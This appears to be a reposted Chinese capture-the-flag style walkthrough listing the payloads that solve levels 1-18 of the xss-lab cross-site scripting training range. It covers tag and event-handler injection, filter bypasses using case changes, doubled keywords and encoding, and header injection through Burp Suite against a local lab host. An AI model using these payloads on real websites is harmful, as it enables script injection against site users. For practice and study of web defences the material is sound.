xss-lab 1-18关payload

Less-1

?name=<script>alert()</script>

Less-2

"><script>alert()</script>
"οnclick="alert()
" οnfοcus="alert()
" οnblur="alert()

Less-3

' οnfοcus='alert()
' οnblur='alert()
' οnfοcus='javascript:alert()'
' οnblur='javascript:alert()
' οnclick='alert()

Less-4

" οnfοcus="alert()
" οnfοcus="javascript:alert()
" οnblur="alert()
" οnblur="javascript:alert()
" οnclick="alert()
" οnclick="javascript:alert()

Less-5

"><a href="javascript:alert();">cooper</a>

Less-6

" Onclick="alert()
" Onfocus="alert()
" Onblur = "alert()
"><a Href="javascript:alert()">cooper</a>
"><Script>alert()</Script>

Less-7

" oonnfocus="alert()
"oonnclick="alert()
" oonnfocus="alert()
"><a hhrefref="javasscriptcript:alert()">cooper</a>
"><sscriptcript>alert()</sscriptcript>

"><img ssrcrc=666 oonnerror=alert()>
"><img srsrcc=666 oonnmouseout=alert()>
"><img srsrcc=666 oonnmouseover=alert()>

Less-8

javascript:alert() （使用Unicode编码）
javascript:alert()

Less-9

javascript:alert() 编码后加http://，注释使用//或/**/
javascript:alert()//http://
javascript:alert()/*http://*/

Less-10

?t_sort=" οnfοcus=javascript:alert(); type="text type（加窗口）
?t_sort=" οnclick=javascript:alert(); type="
?t_sort=" οnblur=javascript:alert(); type="

?keyword=well done!&t_lick=aa&t_history=aa&t_sort=aa 查看哪里可以赋值
?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnclick='alert(123)'
?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnblur='javascript:alert()'
?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnfοcus='alert(123)'

Less-11

使用burpsuite抓包
在Referer处改为Less-10的payload，放行即可
Referer:" οnfοcus=javascript:alert(); type="text

Less-12

使用burpsuite抓包
在UA处改为Less-10的payload，放行即可
User-Agent: " οnfοcus=javascript:alert(); type="text

Less-13

使用burpsuite抓包
在cookie处改为Less-10的payload，放行即可
Cookie: user=" οnfοcus=javascript:alert() type="text

Less-14

网页失效，上传图片属性中含有js代码，详见博客

Less-15

http://192.168.31.110/xss/level15.php?src=' http://192.168.31.110/xss/level1.php?name="><a href="javascript:alert( )">cooper</a>'

Less-16

http://192.168.31.110/xss/level16.php?keyword=%3Ca%0Ahref=%27javasc%0Aript:alert()%27%3Ecooper

Less-17

http://192.168.31.110/xss/level17.php?arg01=a&arg02=b%20οnmοuseοver=javascript:alert()
http://192.168.31.110/xss/level17.php?arg01=a&arg02=b%20οnmοuseοut=javascript:alert()
（在edge上打开，火狐没有弹窗）

Less-18

http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseοver=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseοut=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseleave=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseenter=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοusedοwn=alert() （点击触发）

onmouseover、onmouseout：鼠标移动到自身时候会触发事件，同时移动到其子元素身上也会触发事件
onmouseenter、onmouseleave：鼠标移动到自身是会触发事件，但是移动到其子元素身上不会触发事件

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/web/10657.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！